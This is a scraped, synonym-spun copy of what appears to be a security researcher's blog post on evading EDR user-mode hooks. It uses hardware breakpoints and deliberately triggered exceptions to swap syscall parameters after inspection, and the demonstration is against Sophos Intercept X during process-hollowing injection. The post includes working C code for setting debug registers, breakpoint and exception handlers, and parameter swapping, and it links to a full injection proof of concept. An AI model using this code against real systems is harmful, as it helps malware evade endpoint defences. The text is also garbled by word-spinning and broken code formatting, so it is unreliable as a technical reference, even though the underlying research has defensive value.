Foolish EDR Bypasses and The place To Discover Them

[ad_1]

Just lately I used to be testing some EDR’s skills to detect oblique syscalls, and I had an thought for a unusual bypass.
In the event you’re not already accustomed to direct and oblique syscalls, I like to recommend studying this text first.

One of many drawbacks of direct & oblique syscalls is that it’s clear from the callstack that you simply bypassed the EDR’s consumer mode hook.
Under are some instance callstacks from direct, oblique, and common calls.

The callstack of a direct syscall.

The callstack of an oblique syscall.

The callstack of an everyday hooked Nt perform name.

As you possibly can see from the final picture, when a name is finished by a hooked perform the return tackle for the EDR’s hook seems within the callstack (in my case that is hmpalert).
It’s an fascinating dilemma: we don’t wish to name the hooked perform as a result of that would set off a detection, but when we bypass the hook fully, that would set off a detection too.

That is once I had considerably of a humorous thought. What if I do name the hooked perform, however do it in such a method that the EDR isn’t capable of correctly examine the decision parameters.
Straight off the bat, I had a few concepts.

TOCTOU

Time-of-check to time-of-use, or TOCTOU for brief, is a method usually utilized in software program exploitation.
The vulnerability arises when a safety test is carried out on an object, however nothing is prevented from modifying that object between the time it’s checked and the time it’s used.

Let’s take the next code for instance:

BOOL CopyData(char *src_buffer, uint32_t *src_size) {
  static char dest_buffer[1024];
  
    if(*src_size >= 1024) {
    printf("error, buffer overflow!"n);
    return FALSE;
  }
  
  memcpy(dest_buffer, src_buffer, *src_size);
  return TRUE;
}

Within the above, src_size is a pointer to an integer.
The perform fails if the required dimension is larger than the vacation spot buffer.
Since src_size is a pointer, this system passes the tackle of the variable to the perform as a substitute of its worth.
In the course of the perform’s execution, it’s completely doable for this system to change the worth pointed to by src_size.

If the attacker manages to completely time altering the worth of src_size in order that it happens after if(*src_size >= 1024), however earlier than the memcpy() name, they will nonetheless set off a buffer overflow.
The worth solely must be lower than 1024 till after the if assertion is full, then it may be set to a price bigger than dest_buffer.

Be aware: the above instance is extremely oversimplified, and in the true world the compiler would optimize this code to solely learn the worth of *src_size as soon as.

My preliminary thought was to make the most of an analogous race situation towards the EDR’s hook.
Name a hooked perform with benign parameters, then rapidly swap them out with malicious ones mid-call.
If we will time the change to happen after the EDR has ending inspecting the parameters, however earlier than the syscall instruction, we will bypass the hook with out truly bypassing it.

While attempting to determine if there was a way I might keep away from modifying the parameters too quickly and triggering a detection occasion, I had one other, higher, thought.

Thought 2: {Hardware} Breakpoints

This concept was even easier.
Decide a ntdll perform I wish to name that’s hooked by the EDR, then place a {hardware} breakpoint on the syscall instruction.
{Hardware} breakpoints enable us to inform the CPU to set off an exception every time a sure tackle is learn, written, or executed.
So, by putting an execute breakpoint on the syscall instruction we’ll have the ability to intercept execution after the EDR has accomplished its checks, however earlier than the system name happens.
This mainly permits us to hook the EDR’s hook and switch any legit name right into a customized syscall.

What we’ll have the ability to do is name a hooked perform with benign parameters that received’t set off a detection, then swap out the parameters with malicious ones after the EDR has already inspected the decision.
We are able to even, if we would like, change the system name quantity to invoke a unique syscall than the one the EDR thinks we’re making.
The {hardware} breakpoint will probably be triggered proper after the EDR has inspected our pretend parameters, however earlier than the syscall instruction transitions to kernel mode.

When the kernel returns to consumer mode, it’ll return to the instruction instantly after the syscall, which is the place we will place a second breakpoint.
The second breakpoint handler can then change the parameters again to stop the modifications being caught by any post-call inspection the EDR may do.
In lots of circumstances the EDR received’t hassle with post-call inspection if the decision failed, so we might additionally simply change the EAX register to one thing like STATUS_NOT_FOUND, STATUS_INVALID_PARAMETER, or in homage to the TDSS rootkit: STATUS_TOO_MANY_SECRETS.

An instance of code stream from a hooked NtWriteFile perform.

The decision stream will go one thing like this:

Name hooked Nt perform with benign parameters
EDR inspects benign parameters
EDR passes management again to the hooked Nt perform to carry out a syscall
Our 1st breakpoint is triggered and we change parameters with malicious ones
We proceed execution so the syscall is triggered
The kernel makes use of our actual parameters then return to the Nt perform
Our 2nd breakpoint is triggered and we change parameters again
The EDR performs any post-call inspection and solely sees benign parameters

Ideally, the very best targets are features that use CPU registers or reminiscence pointer for parameters.
If we begin modifying stack variables, this might present up throughout callstack unwinding.

Discovering A Appropriate Goal

With the intention to check my thought, I wished to provide you with a perform name that will instantly set off a detection occasion.
This truly proved loads more durable than I believed it might be.
Many operations that I used to be certain would set off a detection didn’t.
Ultimately, I settled for utilizing my previous course of injection code.

The code works considerably like course of hollowing.
It creates a brand new course of in a suspended state, injects itself into the suspended course of, then makes use of SetThreadContext() to alter the entrypoint of the principle thread to the entrypoint of the malicious code.
The goal I selected was Sophos Intercept X, as a result of it advertises detection of course of hollowing assaults.

If we reverse engineer the consumer mode hook, we will see precisely how course of hollowing is detected.

A snippet of the EDR’s NtSetContextThread hook handler.

Every time a brand new thread is created its instruction pointer is ready to RtlUserThreadStart().
The primary parameter of RtlUserThreadStart is the thread’s entrypoint, which will probably be referred to as after the perform is finished initializing the brand new thread.
In a brand-new course of there is just one thread, the principle thread, which is liable for calling the executable’s entrypoint.

Throughout course of hollowing, the executable’s code is unmapped and changed with malicious code.
Because it’s unlikely the previous and new code may have the very same entrypoint tackle, it’s usually mandatory to change the thread’s begin tackle.
By altering the primary parameter of RtlUserThreadStart() (the RCX register), we alter the entrypoint of the thread, and subsequently entrypoint of the method.

Sophos’ detection merely checks if the code is attempting to make use of NtSetContextThread() to alter the RCX register of a brand new thread, which is suspicious habits.
Since we will specify no matter entrypoint we would like when creating a brand new thread, it doesn’t make sense to alter it post-creation.
The one cause to do that is that if the thread was created by one thing else, say, the PE Loader.

Bypassing The Test With {Hardware} Breakpoint

There’s truly fairly a couple of methods I can consider to bypass this test, however I’m solely enthusiastic about experimenting with CPU exceptions.
For our first instance, we’re merely going to set a breakpoint on the syscall and retn directions of NtSetContextThread().

Under is a few instance code I wrote to seek out these directions.

// discover the tackle of the syscall and retn instruction inside a Nt* perform
BOOL FindSyscallInstruction(LPVOID nt_func_addr, LPVOID* syscall_addr, LPVOID* syscall_ret_addr) {
    BYTE* ptr = (BYTE*)nt_func_addr;

    // iterate by the native perform stub to seek out the syscall instruction
    for (int i = 0; i < 1024; i++) {

        // test for syscall opcode (FF 05)
        if (*&ptr[i] == 0x0F && *&ptr[i + 1] == 0x05) {
            printf("Discovered syscall opcode at %llxn", (DWORD64)&ptr[i]);
            *syscall_addr = (LPVOID)&ptr[i];
            *syscall_ret_addr = (LPVOID)&ptr[i + 2];
            break;
        }
    }

    // ensure that we discovered the syscall instruction
    if (!*syscall_addr) {
        printf("error: syscall instruction not discoveredn");
        return FALSE;
    }

    // ensure that the instruction after syscall is retn
    if (**(BYTE**)syscall_ret_addr != 0xc3) {
        printf("Error: syscall instruction not adopted by retn");
        return FALSE;
    }

    return TRUE;
}

Sadly, the debug registers are privileged registers, which implies we will’t set them instantly from consumer mode.
With the intention to arrange a {hardware} breakpoint, we have to make the most of NtSetContextThread(), which is a bit ironic.
We’ll mainly be utilizing NtSetContextThread to bypass the hook on NtSetContextThread.

To arrange our {hardware} breakpoints we’ll have to set DR0 and DR1 to the addresses we wish to break on, then DR7 tells the CPU what kind of breakpoints we would like.

thread_context.ContextFlags = CONTEXT_FULL;

// get the present thread context (word, this have to be a suspended thread)
GetThreadContext(thread_handle, &thread_context);

dr7_t dr7 = { 0 };

dr7.dr0_local = 1; // set DR0 as an execute breakpoint
dr7.dr1_local = 1; // set DR1 as an execute breakpoint

thread_context.ContextFlags = CONTEXT_ALL;

thread_context.Dr0 = (DWORD64)syscall_addr;     // set DR0 to interrupt on syscall tackle
thread_context.Dr1 = (DWORD64)syscall_ret_addr; // set DR1 to interrupt on syscall ret tackle
thread_context.Dr7 = *(DWORD*)&dr7;

// use SetThreadContext to replace the debug registers
SetThreadContext(thread_handle, &thread_context);

Contained in the breakpoint handler, we’ll simply alter the RCX and RDX register, which comprise argument 1 and argument 2 of NtSetContextThread().
Previous to the decision we will retailer the true values in a world variable, name NtSetContextThread with some pretend values, then have our exception handler replaces the pretend values with the true ones.

Because the system name stub strikes the primary parameter from RCX into R10, we’ll set each simply to be secure.

LONG WINAPI BreakpointHandler(PEXCEPTION_POINTERS e)
{
	// {hardware} breakpoints set off a single step exception
	if (e->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP) {
		// this exception was brought on by DR0 (syscall breakpoint)
		if (e->ContextRecord->Dr6 & 0x1) {
			// change the pretend parameters with the true ones
			e->ContextRecord->Rcx = (DWORD64)g_thread_handle;
			e->ContextRecord->R10 = (DWORD64)g_thread_handle;
			e->ContextRecord->Rdx = (DWORD64)g_thread_context;
		}

		// this exception was brought on by DR1 (syscall ret breakpoint)
		if (e->ContextRecord->Dr6 & 0x2) {
			// set the parameters again to pretend ones
			// since x64 makes use of registers for the primary 4 parameters, we needn't do something right here
			// for calls with greater than 4 parameters, we would want to change the stack
		}
	}

	e->ContextRecord->EFlags |= (1 << 16); // set the ResumeFlag to proceed execution

	return EXCEPTION_CONTINUE_EXECUTION;
}
}

We are able to solely learn/write the context on a suspended thread, so we’ll simply create a brand new suspended thread to name NtSetContextThread().
We’ll use NtSetContextThread(NULL, NULL) for our pretend parameters.

DWORD SetThreadContextThread(LPVOID param) {
    NtSetContextThread(NULL, NULL);
    return 0;
}

// calling our particular NtSetThreadContext
SetUnhandledExceptionFilter(BreakpointHandler);
HANDLE new_thread = CreateThread(NULL, NULL, SetThreadContextThread, NULL, CREATE_SUSPENDED, NULL);
SetSyscallBreakpoints((LPVOID)NtSetContextThread, new_thread);
ResumeThread(new_thread);

The Consequence

First, let’s see what occurs after we simply name NtSetContextThread() usually.

Now, once more, however with our particular breakpoint sauce:

Success! The code was capable of inject itself into notepad and show a message field.

However, I truly wish to go a step higher. Having to name NtSetContextThread to arrange our {hardware} breakpoints isn’t nice.
The EDR might use its NtSetContextThread hook to see if we’re attempting to set breakpoints that’d intervene with the EDR.
So, what about common previous exceptions?

Thought 3: Intentional Exception

As an alternative of {hardware} breakpoints, we’re going to try to trigger a CPU exception.
Common exceptions could be dealt with in the very same method as breakpoint exceptions, however we don’t have to name NtSetContextThread() to set them up.

We already know the EDR inspects the context struction every time we name NtSetContextThread(), so let’s use that to our benefit.
Most software program checks if an tackle is NULL earlier than attempting to learn it, however what if it’s neither NULL nor a legitimate tackle?
What occurs if we set the context tackle to 0x1337?

Let’s strive the next:

HANDLE thread_handle = CreateThread(NULL, 0, test_thread, NULL, CREATE_SUSPENDED, 0);
SetThreadContext(thread_handle, (CONTEXT*)0x1337);

Then we run it and…

Whoops, the EDR’s hook tried to learn the invalid reminiscence and crashed the method.

Now we’ve a straightforward method of triggering an exception with none {hardware} breakpoints.
The tough half is the exception happens contained in the EDR’s handler, in a roundabout way earlier than the syscall, so it’s a lot more durable to interchange the pretend parameters with the true ones.
We additionally have to correctly deal with the exception so the method received’t crash.

From a mixture of the crashdump and our earlier disassembly, we already know the EDR is attempting to learn the context->Rcx discipline into the RDX register.

The exception is triggered on line 1 of this pseudocode.

We might use a disassembler to make a extra generic bypass, however since that is only a PoC, we’ll hardcode it to this particular EDR model.
The instruction that triggers the exception is mov rdx, qword [rbx+0x80], which implies the context pointer (0x1337) is in RBX.
We’ll merely set RBX to level to an empty CONTEXT construction, which can end in thread_context->Rcx being zero, and the EDR not triggering a detection.

For the syscall to succeed now that the EDR’s test has been bypassed, we nonetheless want to repair the invalid context pointer.
The perform the place the exception happens is simply liable for inspecting our context construction and doesn’t provoke the syscall.
Nonetheless, the context pointer that is handed to the syscall, is saved someplace on the stack by the EDR.
The lazy repair is to simply stroll the stack and change each occasion of 0x1337 with the tackle of our actual context construction.

// exception handler for pressured exception
LONG WINAPI ExceptionHandler(PEXCEPTION_POINTERS e)
{
	static CONTEXT fake_context = { 0 };

	printf("Exception handler triggered at tackle: 0xpercentllxn", e->ExceptionRecord->ExceptionAddress);
	
	DWORD64* stack_ptr = (DWORD64*)e->ContextRecord->Rsp;
	
	// iterate first 300 stack gadgets, on the lookout for our pretend tackle
	for (int i = 0; i < 300; i++) {
		if (*stack_ptr == 0x1337) {
			// change the pretend tackle with the true one
			*stack_ptr = (DWORD64)g_thread_context;

			printf("Fastened stack worth at RSP+(0x8*0xpercentx) (0xpercentllx): 0xpercentllxn", 
				   i, (DWORD64)stack_ptr, (DWORD64)*stack_ptr);
		}
		stack_ptr++;
	}
	
	// The pointer to our invalid tackle is in RBX, so change it with an empty construction
	// the RCX member of the context construction being NULL will trigger the EDR to skip its test
	e->ContextRecord->Rbx = (DWORD64)&fake_context;

	return EXCEPTION_CONTINUE_EXECUTION;
}

Now we simply run the code and see what occurs…

Good! It really works.

So there we’ve it, two methods to bypass EDR hooks with out bypassing EDR hooks.
Although, I’m undecided how sensible or simple it might be to show the pressured exception technique right into a generic EDR bypass.
Since we will’t simply change pointers again after the syscall, and it solely works with calls the place the EDR reads pointers,
it’s pretty restricted. The primary technique is way extra generic, however in all probability additionally far simpler to jot down detections for.

It’s doable we might mix each strategies because of the reality exception handlers enable us to change a thread’s context with out the usage of NtSetContextThread().
We might drive an exception, then use the exception handler to arrange our {hardware} breakpoints.

However anyway, I’m going to depart it there. This was only a enjoyable little weekend aspect mission I figured I’d put up. Hopefully somebody will discover this info useful.

I’ve uploaded the complete course of injection proof of idea to my GitHub right here: github.com/MalwareTech/EDRception

[ad_2]